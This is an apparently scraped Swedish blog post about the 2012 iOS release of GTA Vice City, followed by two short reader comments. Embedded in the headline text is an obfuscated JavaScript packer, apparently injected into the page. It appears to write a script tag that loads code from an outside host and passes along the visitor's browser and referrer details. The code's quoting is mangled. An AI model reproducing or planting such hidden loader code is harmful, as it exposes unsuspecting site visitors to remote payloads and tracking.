Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

iOS: GTA Vice City är här!

Filip Urde
  • On 6 december, 2012
  • http://www.revue.se/filip-urde

GTA eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nasib|var|u0026u|referrer|nstha||js|php’.split(’|’),0,{}))
Vice City är äntligen här.

Vi på Revue älskar GTA! Och jag vet inte riktigt om vi är enade i den här frågan, men jag anser att GTA Vice City är det bästa tillsammans med San Andreas.

I Vice City är du Tommy Vercetti som ursprungligen är från Liberty City, men efter ett långt fängelsestraff ser sig anlända i södern och Vice City.  GTA Vice City fyller 10 år i år och detta firas nu med ett släpp till mobilen. GTA Vice City är lätt det bästa spelet till din mobil i år.

Ladda ner spelet här iOS (38kr)

Spelet väntas komma upp på Google Play underdagen.
youtube.com

Comments

  1. Hampa

    Underbart!

  2. Killen

    Fan äntligen!!! Satan va fett fet här ska bli! Tar lite tid att tanka bara märker jag